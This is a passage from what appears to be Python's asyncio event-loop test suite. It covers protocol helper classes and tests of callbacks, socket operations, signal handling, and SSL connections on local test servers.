self.state = 'INITIALIZED'
def datagram_received(self, data, addr):
assert self.state == 'INITIALIZED', self.state
self.nbytes += len(data)
def error_received(self, exc):
assert self.state == 'INITIALIZED', self.state
def connection_lost(self, exc):
assert self.state == 'INITIALIZED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyReadPipeProto(asyncio.Protocol):
done = None
def __init__(self, loop=None):
self.state = ['INITIAL']
self.nbytes = 0
self.transport = None
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == ['INITIAL'], self.state
self.state.append('CONNECTED')
def data_received(self, data):
assert self.state == ['INITIAL', 'CONNECTED'], self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == ['INITIAL', 'CONNECTED'], self.state
self.state.append('EOF')
def connection_lost(self, exc):
if 'EOF' not in self.state:
self.state.append('EOF') # It is okay if EOF is missed.
assert self.state == ['INITIAL', 'CONNECTED', 'EOF'], self.state
self.state.append('CLOSED')
if self.done:
self.done.set_result(None)
class MyWritePipeProto(asyncio.BaseProtocol):
done = None
def __init__(self, loop=None):
self.state = 'INITIAL'
self.transport = None
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
def connection_lost(self, exc):
assert self.state == 'CONNECTED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MySubprocessProtocol(asyncio.SubprocessProtocol):
def __init__(self, loop):
self.state = 'INITIAL'
self.transport = None
self.connected = asyncio.Future(loop=loop)
self.completed = asyncio.Future(loop=loop)
self.disconnects = {fd: asyncio.Future(loop=loop) for fd in range(3)}
self.data = {1: b'', 2: b''}
self.returncode = None
self.got_data = {1: asyncio.Event(loop=loop),
2: asyncio.Event(loop=loop)}
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
self.connected.set_result(None)
def connection_lost(self, exc):
assert self.state == 'CONNECTED', self.state
self.state = 'CLOSED'
self.completed.set_result(None)
def pipe_data_received(self, fd, data):
assert self.state == 'CONNECTED', self.state
self.data[fd] += data
self.got_data[fd].set()
def pipe_connection_lost(self, fd, exc):
assert self.state == 'CONNECTED', self.state
if exc:
self.disconnects[fd].set_exception(exc)
else:
self.disconnects[fd].set_result(exc)
def process_exited(self):
assert self.state == 'CONNECTED', self.state
self.returncode = self.transport.get_returncode()
class EventLoopTestsMixin:
def setUp(self):
super().setUp()
self.loop = self.create_event_loop()
self.set_event_loop(self.loop)
def tearDown(self):
        # just in case we still have transport close callbacks pending
if not self.loop.is_closed():
test_utils.run_briefly(self.loop)
self.doCleanups()
support.gc_collect()
super().tearDown()
def test_run_until_complete_nesting(self):
@asyncio.coroutine
def coro1():
yield
@asyncio.coroutine
def coro2():
self.assertTrue(self.loop.is_running())
self.loop.run_until_complete(coro1())
self.assertRaises(
RuntimeError, self.loop.run_until_complete, coro2())
# Note: because of the default Windows timing granularity of
# 15.6 msec, we use fairly long sleep times here (~100 msec).
def test_run_until_complete(self):
t0 = self.loop.time()
self.loop.run_until_complete(asyncio.sleep(0.1, loop=self.loop))
t1 = self.loop.time()
self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
def test_run_until_complete_stopped(self):
async def cb():
self.loop.stop()
await asyncio.sleep(0.1, loop=self.loop)
task = cb()
self.assertRaises(RuntimeError,
self.loop.run_until_complete, task)
def test_call_later(self):
results = []
def callback(arg):
results.append(arg)
self.loop.stop()
self.loop.call_later(0.1, callback, 'hello world')
t0 = time.monotonic()
self.loop.run_forever()
t1 = time.monotonic()
self.assertEqual(results, ['hello world'])
self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
def test_call_soon(self):
results = []
def callback(arg1, arg2):
results.append((arg1, arg2))
self.loop.stop()
self.loop.call_soon(callback, 'hello', 'world')
self.loop.run_forever()
self.assertEqual(results, [('hello', 'world')])
def test_call_soon_threadsafe(self):
results = []
lock = threading.Lock()
def callback(arg):
results.append(arg)
if len(results) >= 2:
self.loop.stop()
def run_in_thread():
self.loop.call_soon_threadsafe(callback, 'hello')
lock.release()
lock.acquire()
t = threading.Thread(target=run_in_thread)
t.start()
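        # wait until the worker thread has scheduled 'hello' before scheduling 'world'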
with lock:
self.loop.call_soon(callback, 'world')
self.loop.run_forever()
t.join()
self.assertEqual(results, ['hello', 'world'])
def test_call_soon_threadsafe_same_thread(self):
results = []
def callback(arg):
results.append(arg)
if len(results) >= 2:
self.loop.stop()
self.loop.call_soon_threadsafe(callback, 'hello')
self.loop.call_soon(callback, 'world')
self.loop.run_forever()
self.assertEqual(results, ['hello', 'world'])
def test_run_in_executor(self):
def run(arg):
return (arg, threading.get_ident())
f2 = self.loop.run_in_executor(None, run, 'yo')
res, thread_id = self.loop.run_until_complete(f2)
self.assertEqual(res, 'yo')
self.assertNotEqual(thread_id, threading.get_ident())
def test_reader_callback(self):
r, w = socket.socketpair()
r.setblocking(False)
bytes_read = bytearray()
def reader():
try:
data = r.recv(1024)
except BlockingIOError:
# Spurious readiness notifications are possible
# at least on Linux -- see man select.
return
if data:
bytes_read.extend(data)
else:
self.assertTrue(self.loop.remove_reader(r.fileno()))
r.close()
self.loop.add_reader(r.fileno(), reader)
self.loop.call_soon(w.send, b'abc')
test_utils.run_until(self.loop, lambda: len(bytes_read) >= 3)
self.loop.call_soon(w.send, b'def')
test_utils.run_until(self.loop, lambda: len(bytes_read) >= 6)
self.loop.call_soon(w.close)
self.loop.call_soon(self.loop.stop)
self.loop.run_forever()
self.assertEqual(bytes_read, b'abcdef')
def test_writer_callback(self):
r, w = socket.socketpair()
w.setblocking(False)
def writer(data):
w.send(data)
self.loop.stop()
data = b'x' * 1024
self.loop.add_writer(w.fileno(), writer, data)
self.loop.run_forever()
self.assertTrue(self.loop.remove_writer(w.fileno()))
self.assertFalse(self.loop.remove_writer(w.fileno()))
w.close()
read = r.recv(len(data) * 2)
r.close()
self.assertEqual(read, data)
def _basetest_sock_client_ops(self, httpd, sock):
if not isinstance(self.loop, proactor_events.BaseProactorEventLoop):
# in debug mode, socket operations must fail
# if the socket is not in blocking mode
self.loop.set_debug(True)
sock.setblocking(True)
with self.assertRaises(ValueError):
self.loop.run_until_complete(
self.loop.sock_connect(sock, httpd.address))
with self.assertRaises(ValueError):
self.loop.run_until_complete(
self.loop.sock_sendall(sock, b'GET / HTTP/1.0\r\n\r\n'))
with self.assertRaises(ValueError):
self.loop.run_until_complete(
self.loop.sock_recv(sock, 1024))
with self.assertRaises(ValueError):
self.loop.run_until_complete(
self.loop.sock_recv_into(sock, bytearray()))
with self.assertRaises(ValueError):
self.loop.run_until_complete(
self.loop.sock_accept(sock))
# test in non-blocking mode
sock.setblocking(False)
self.loop.run_until_complete(
self.loop.sock_connect(sock, httpd.address))
self.loop.run_until_complete(
self.loop.sock_sendall(sock, b'GET / HTTP/1.0\r\n\r\n'))
data = self.loop.run_until_complete(
self.loop.sock_recv(sock, 1024))
# consume data
self.loop.run_until_complete(
self.loop.sock_recv(sock, 1024))
sock.close()
self.assertTrue(data.startswith(b'HTTP/1.0 200 OK'))
def _basetest_sock_recv_into(self, httpd, sock):
# same as _basetest_sock_client_ops, but using sock_recv_into
sock.setblocking(False)
self.loop.run_until_complete(
self.loop.sock_connect(sock, httpd.address))
self.loop.run_until_complete(
self.loop.sock_sendall(sock, b'GET / HTTP/1.0\r\n\r\n'))
data = bytearray(1024)
with memoryview(data) as buf:
nbytes = self.loop.run_until_complete(
self.loop.sock_recv_into(sock, buf[:1024]))
# consume data
self.loop.run_until_complete(
self.loop.sock_recv_into(sock, buf[nbytes:]))
sock.close()
self.assertTrue(data.startswith(b'HTTP/1.0 200 OK'))
def test_sock_client_ops(self):
with test_utils.run_test_server() as httpd:
sock = socket.socket()
self._basetest_sock_client_ops(httpd, sock)
sock = socket.socket()
self._basetest_sock_recv_into(httpd, sock)
@support.skip_unless_bind_unix_socket
def test_unix_sock_client_ops(self):
with test_utils.run_test_unix_server() as httpd:
sock = socket.socket(socket.AF_UNIX)
self._basetest_sock_client_ops(httpd, sock)
sock = socket.socket(socket.AF_UNIX)
self._basetest_sock_recv_into(httpd, sock)
def test_sock_client_fail(self):
# Make sure that we will get an unused port
address = None
try:
s = socket.socket()
s.bind(('127.0.0.1', 0))
address = s.getsockname()
finally:
s.close()
sock = socket.socket()
sock.setblocking(False)
with self.assertRaises(ConnectionRefusedError):
self.loop.run_until_complete(
self.loop.sock_connect(sock, address))
sock.close()
def test_sock_accept(self):
listener = socket.socket()
listener.setblocking(False)
listener.bind(('127.0.0.1', 0))
listener.listen(1)
client = socket.socket()
client.connect(listener.getsockname())
f = self.loop.sock_accept(listener)
conn, addr = self.loop.run_until_complete(f)
self.assertEqual(conn.gettimeout(), 0)
self.assertEqual(addr, client.getsockname())
self.assertEqual(client.getpeername(), listener.getsockname())
client.close()
conn.close()
listener.close()
@unittest.skipUnless(hasattr(signal, 'SIGKILL'), 'No SIGKILL')
def test_add_signal_handler(self):
caught = 0
def my_handler():
nonlocal caught
caught += 1
# Check error behavior first.
self.assertRaises(
TypeError, self.loop.add_signal_handler, 'boom', my_handler)
self.assertRaises(
TypeError, self.loop.remove_signal_handler, 'boom')
self.assertRaises(
ValueError, self.loop.add_signal_handler, signal.NSIG+1,
my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, signal.NSIG+1)
self.assertRaises(
ValueError, self.loop.add_signal_handler, 0, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, 0)
self.assertRaises(
ValueError, self.loop.add_signal_handler, -1, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, -1)
self.assertRaises(
RuntimeError, self.loop.add_signal_handler, signal.SIGKILL,
my_handler)
# Removing SIGKILL doesn't raise, since we don't call signal().
self.assertFalse(self.loop.remove_signal_handler(signal.SIGKILL))
# Now set a handler and handle it.
self.loop.add_signal_handler(signal.SIGINT, my_handler)
os.kill(os.getpid(), signal.SIGINT)
test_utils.run_until(self.loop, lambda: caught)
# Removing it should restore the default handler.
self.assertTrue(self.loop.remove_signal_handler(signal.SIGINT))
self.assertEqual(signal.getsignal(signal.SIGINT),
signal.default_int_handler)
# Removing again returns False.
self.assertFalse(self.loop.remove_signal_handler(signal.SIGINT))
@unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
def test_signal_handling_while_selecting(self):
# Test with a signal actually arriving during a select() call.
caught = 0
def my_handler():
nonlocal caught
caught += 1
self.loop.stop()
self.loop.add_signal_handler(signal.SIGALRM, my_handler)
signal.setitimer(signal.ITIMER_REAL, 0.01, 0) # Send SIGALRM once.
self.loop.run_forever()
self.assertEqual(caught, 1)
@unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
def test_signal_handling_args(self):
some_args = (42,)
caught = 0
def my_handler(*args):
nonlocal caught
caught += 1
self.assertEqual(args, some_args)
self.loop.add_signal_handler(signal.SIGALRM, my_handler, *some_args)
signal.setitimer(signal.ITIMER_REAL, 0.1, 0) # Send SIGALRM once.
self.loop.call_later(0.5, self.loop.stop)
self.loop.run_forever()
self.assertEqual(caught, 1)
def _basetest_create_connection(self, connection_fut, check_sockname=True):
tr, pr = self.loop.run_until_complete(connection_fut)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.assertIs(pr.transport, tr)
if check_sockname:
self.assertIsNotNone(tr.get_extra_info('sockname'))
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def test_create_connection(self):
with test_utils.run_test_server() as httpd:
conn_fut = self.loop.create_connection(
lambda: MyProto(loop=self.loop), *httpd.address)
self._basetest_create_connection(conn_fut)
@support.skip_unless_bind_unix_socket
def test_create_unix_connection(self):
# Issue #20682: On Mac OS X Tiger, getsockname() returns a
# zero-length address for UNIX socket.
check_sockname = not osx_tiger()
with test_utils.run_test_unix_server() as httpd:
conn_fut = self.loop.create_unix_connection(
lambda: MyProto(loop=self.loop), httpd.address)
self._basetest_create_connection(conn_fut, check_sockname)
def test_create_connection_sock(self):
with test_utils.run_test_server() as httpd:
sock = None
infos = self.loop.run_until_complete(
self.loop.getaddrinfo(
*httpd.address, type=socket.SOCK_STREAM))
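            # try each resolved address until a connection succeeds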
for family, type, proto, cname, address in infos:
try:
sock = socket.socket(family=family, type=type, proto=proto)
sock.setblocking(False)
self.loop.run_until_complete(
self.loop.sock_connect(sock, address))
except:
pass
else:
break
else:
assert False, 'Can not create socket.'
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop), sock=sock)
tr, pr = self.loop.run_until_complete(f)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def check_ssl_extra_info(self, client, check_sockname=True,
peername=None, peercert={}):
if check_sockname:
self.assertIsNotNone(client.get_extra_info('sockname'))
if peername:
self.assertEqual(peername,
client.get_extra_info('peername'))
else:
self.assertIsNotNone(client.get_extra_info('peername'))
self.assertEqual(peercert,
client.get_extra_info('peercert'))
# test SSL cipher
cipher = client.get_extra_info('cipher')
self.assertIsInstance(cipher, tuple)
self.assertEqual(len(cipher), 3, cipher)
self.assertIsInstance(cipher[0], str)
self.assertIsInstance(cipher[1], str)
self.assertIsInstance(cipher[2], int)
# test SSL object
sslobj = client.get_extra_info('ssl_object')
self.assertIsNotNone(sslobj)
self.assertEqual(sslobj.compression(),
client.get_extra_info('compression'))
self.assertEqual(sslobj.cipher(),
client.get_extra_info('cipher'))
self.assertEqual(sslobj.getpeercert(),
client.get_extra_info('peercert'))
self.assertEqual(sslobj.compression(),
client.get_extra_info('compression'))
def _basetest_create_ssl_connection(self, connection_fut,
check_sockname=True,
peername=None):
tr, pr = self.loop.run_until_complete(connection_fut)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.assertTrue('ssl' in tr.__class__.__name__.lower())
self.check_ssl_extra_info(tr, check_sockname, peername)
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def _test_create_ssl_connection(self, httpd, create_connection,
check_sockname=True, peername=None):
conn_fut = create_connection(ssl=test_utils.dummy_ssl_context())
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
# ssl.Purpose was introduced in Python 3.4
if hasattr(ssl, 'Purpose'):
def _dummy_ssl_create_context(purpose=ssl.Purpose.SERVER_AUTH, *,
cafile=None, capath=None,
cadata=None):
"""
A ssl.create_default_context() replacement that doesn't enable
cert validation.
"""
self.assertEqual(purpose, ssl.Purpose.SERVER_AUTH)
return test_utils.dummy_ssl_context()
# With ssl=True, ssl.create_default_context() should be called
with mock.patch('ssl.create_default_context',
side_effect=_dummy_ssl_create_context) as m:
conn_fut = create_connection(ssl=True)
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
self.assertEqual(m.call_count, 1)
# With the real ssl.create_default_context(), certificate
# validation will fail
with self.assertRaises(ssl.SSLError) as cm:
conn_fut = create_connection(ssl=True)
# Ignore the "SSL handshake failed" log in debug mode
with test_utils.disable_logger():
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
self.assertEqual(cm.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_ssl_connection(self):
with test_utils.run_test_server(use_ssl=True) as httpd:
create_connection = functools.partial(
self.loop.create_connection,
lambda: MyProto(loop=self.loop),
*httpd.address)
self._test_create_ssl_connection(httpd, create_connection,
peername=httpd.address)
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_ssl_unix_connection(self):
# Issue #20682: On Mac OS X Tiger, getsockname() returns a
# zero-length address for UNIX socket.
check_sockname = not osx_tiger()
with test_utils.run_test_unix_server(use_ssl=True) as httpd:
create_connection = functools.partial(
self.loop.create_unix_connection,
lambda: MyProto(loop=self.loop), httpd.address,
server_hostname='127.0.0.1')
self._test_create_ssl_connection(httpd, create_connection,
check_sockname,
peername=httpd.address)
def test_create_connection_local_addr(self):
with test_utils.run_test_server() as httpd:
port = support.find_unused_port()
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=(httpd.address[0], port))
tr, pr = self.loop.run_until_complete(f)
expected = pr.transport.get_extra_info('sockname')[1]
self.assertEqual(port, expected)
tr.close()
def test_create_connection_local_addr_in_use(self):
with test_utils.run_test_server() as httpd:
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=httpd.address)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
self.assertIn(str(httpd.address), cm.exception.strerror)
def test_connect_accepted_socket(self, server_ssl=None, client_ssl=None):
loop = self.loop
class MyProto(MyBaseProto):
def connection_lost(self, exc):
super().connection_lost(exc)
loop.call_soon(loop.stop)
def data_received(self, data):
super().data_received(data)
self.transport.write(expected_response)
lsock = socket.socket()
lsock.bind(('127.0.0.1', 0))
lsock.listen(1)
addr = lsock.getsockname()
message = b'test data'
response = None
expected_response = b'roger'
def client():
nonlocal response
try:
csock = socket.socket()
if client_ssl is not None:
csock = client_ssl.wrap_socket(csock)
csock.connect(addr)
csock.sendall(message)
response = csock.recv(99)
csock.close()
except Exception as exc:
print(
"Failure in client thread in test_connect_accepted_socket",
exc)
thread = threading.Thread(target=client, daemon=True)
thread.start()
conn, _ = lsock.accept()
proto = MyProto(loop=loop)
proto.loop = loop
loop.run_until_complete(
loop.connect_accepted_socket(
(lambda: proto), conn, ssl=server_ssl))
loop.run_forever()
proto.transport.close()
lsock.close()
support.join_thread(thread, timeout=1)
self.assertFalse(thread.is_alive())
self.assertEqual(proto.state, 'CLOSED')
self.assertEqual(proto.nbytes, len(message))
self.assertEqual(response, expected_response)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_ssl_connect_accepted_socket(self):
if (sys.platform == 'win32' and
sys.version_info < (3, 5) and
isinstance(self.loop, proactor_events.BaseProactorEventLoop)
):
raise unittest.SkipTest(
'SSL not supported with proactor event loops before Python 3.5'
)
server_context = test_utils.simple_server_sslcontext()
client_context = test_utils.simple_client_sslcontext()
self.test_connect_accepted_socket(server_context, client_context)
def test_connect_accepted_socket_ssl_timeout_for_plain_socket(self):
sock = socket.socket()
self.addCleanup(sock.close)
coro = self.loop.connect_accepted_socket(
MyProto, sock, ssl_handshake_timeout=1)
with self.assertRaisesRegex(
ValueError,
'ssl_handshake_timeout is only meaningful with ssl'):
self.loop.run_until_complete(coro)
@mock.patch('asyncio.base_events.socket')
def create_server_multiple_hosts(self, family, hosts, mock_sock):
@asyncio.coroutine
def getaddrinfo(host, port, *args, **kw):
if family == socket.AF_INET:
return [(family, socket.SOCK_STREAM, 6, '', (host, port))]
else:
return [(family, socket.SOCK_STREAM, 6, '', (host, port, 0, 0))]
def getaddrinfo_task(*args, **kwds):
return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
unique_hosts = set(hosts)
if family == socket.AF_INET:
mock_sock.socket().getsockbyname.side_effect = [
(host, 80) for host in unique_hosts]
else:
mock_sock.socket().getsockbyname.side_effect = [
(host, 80, 0, 0) for host in unique_hosts]
self.loop.getaddrinfo = getaddrinfo_task
self.loop._start_serving = mock.Mock()
self.loop._stop_serving = mock.Mock()
f = self.loop.create_server(lambda: MyProto(self.loop), hosts, 80)
server = self.loop.run_until_complete(f)
self.addCleanup(server.close)
server_hosts = {sock.getsockbyname()[0] for sock in server.sockets}
self.assertEqual(server_hosts, unique_hosts)
def test_create_server_multiple_hosts_ipv4(self):
self.create_server_multiple_hosts(socket.AF_INET,
['1.2.3.4', '5.6.7.8', '1.2.3.4'])
def test_create_server_multiple_hosts_ipv6(self):
self.create_server_multiple_hosts(socket.AF_INET6,
['::1', '::2', '::1'])
def test_create_server(self):
proto = MyProto(self.loop)
f = self.loop.create_server(lambda: proto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.sendall(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('sockname'))
self.assertEqual('127.0.0.1',
proto.transport.get_extra_info('peername')[0])
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
        # the client socket must be closed afterwards to avoid ECONNRESET upon
        # recv()/send() on the serving socket
client.close()
# close server
server.close()
@unittest.skipUnless(hasattr(socket, 'SO_REUSEPORT'), 'No SO_REUSEPORT')
def test_create_server_reuse_port(self):
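        # SO_REUSEPORT should be off by default and enabled only when
        # reuse_port=True is passed to create_server().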
proto = MyProto(self.loop)
f = self.loop.create_server(
lambda: proto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
server.close()
test_utils.run_briefly(self.loop)
proto = MyProto(self.loop)
f = self.loop.create_server(
lambda: proto, '0.0.0.0', 0, reuse_port=True)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
server.close()
def _make_unix_server(self, factory, **kwargs):
path = test_utils.gen_unix_socket_path()
self.addCleanup(lambda: os.path.exists(path) and os.unlink(path))
f = self.loop.create_unix_server(factory, path, **kwargs)
server = self.loop.run_until_complete(f)
return server, path
@support.skip_unless_bind_unix_socket
def test_create_unix_server(self):
proto = MyProto(loop=self.loop)
server, path = self._make_unix_server(lambda: proto)
self.assertEqual(len(server.sockets), 1)
client = socket.socket(socket.AF_UNIX)
client.connect(path)
client.sendall(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
        # the client socket must be closed afterwards to avoid ECONNRESET upon
        # recv()/send() on the serving socket
client.close()
# close server
server.close()
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server_path_socket_error(self):
proto = MyProto(loop=self.loop)
sock = socket.socket()
with sock:
f = self.loop.create_unix_server(lambda: proto, '/test', sock=sock)
with self.assertRaisesRegex(ValueError,
'path and sock can not be specified '
'at the same time'):
self.loop.run_until_complete(f)
def _create_ssl_context(self, certfile, keyfile=None):
sslcontext = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
sslcontext.options |= ssl.OP_NO_SSLv2
sslcontext.load_cert_chain(certfile, keyfile)
return sslcontext
def _make_ssl_server(self, factory, certfile, keyfile=None):
sslcontext = self._create_ssl_context(certfile, keyfile)
f = self.loop.create_server(factory, '127.0.0.1', 0, ssl=sslcontext)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '127.0.0.1')
return server, host, port
def _make_ssl_unix_server(self, factory, certfile, keyfile=None):
sslcontext = self._create_ssl_context(certfile, keyfile)
return self._make_unix_server(factory, ssl=sslcontext)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.ONLYCERT, test_utils.ONLYKEY)
f_c = self.loop.create_connection(MyBaseProto, host, port,
ssl=test_utils.dummy_ssl_context())
client, pr = self.loop.run_until_complete(f_c)
client.write(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.check_ssl_extra_info(client, peername=(host, port))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
        # the client socket must be closed afterwards to avoid ECONNRESET upon
        # recv()/send() on the serving socket
client.close()
# stop serving
server.close()
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_unix_server_ssl(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, test_utils.ONLYCERT, test_utils.ONLYKEY)
f_c = self.loop.create_unix_connection(
MyBaseProto, path, ssl=test_utils.dummy_ssl_context(),
server_hostname='')
client, pr = self.loop.run_until_complete(f_c)
client.write(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
        # the client socket must be closed afterwards to avoid ECONNRESET upon
        # recv()/send() on the serving socket
client.close()
# stop serving
server.close()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_verify_failed(self):
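        # The client requires certificate verification but loads no CA, so the
        # TLS handshake must fail with a certificate verification error.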
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# no CA loaded
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client)
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(ssl.SSLError,
'(?i)certificate.verify.failed'):
self.loop.run_until_complete(f_c)
# execute the loop to log the connection error
test_utils.run_briefly(self.loop)
# close connection
self.assertIsNone(proto.transport)
server.close()
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_unix_server_ssl_verify_failed(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# no CA loaded
f_c = self.loop.create_unix_connection(MyProto, path,
ssl=sslcontext_client,
server_hostname='invalid')
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(ssl.SSLError,
'(?i)certificate.verify.failed'):
self.loop.run_until_complete(f_c)
# execute the loop to log the connection error
test_utils.run_briefly(self.loop)
# close connection
self.assertIsNone(proto.transport)
server.close()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_match_failed(self):
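        # The client trusts the signing CA but connects by IP address, so
        # certificate checking fails with an IP address mismatch for '127.0.0.1'.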
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(
cafile=test_utils.SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# incorrect server_hostname
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client)
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(
ssl.CertificateError,
"IP address mismatch, certificate is not valid for "
"'127.0.0.1'"):
self.loop.run_until_complete(f_c)
# close connection
# transport is None because TLS ALERT aborted the handshake
self.assertIsNone(proto.transport)
server.close()
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_unix_server_ssl_verified(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(cafile=test_utils.SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# Connection succeeds with correct CA and server hostname.
f_c = self.loop.create_unix_connection(MyProto, path,
ssl=sslcontext_client,
server_hostname='localhost')
client, pr = self.loop.run_until_complete(f_c)
# close connection
proto.transport.close()
client.close()
server.close()
self.loop.run_until_complete(proto.done)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_verified(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(cafile=test_utils.SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# Connection succeeds with correct CA and server hostname.
f_c = self.loop.create_connection(MyProto, host, port,
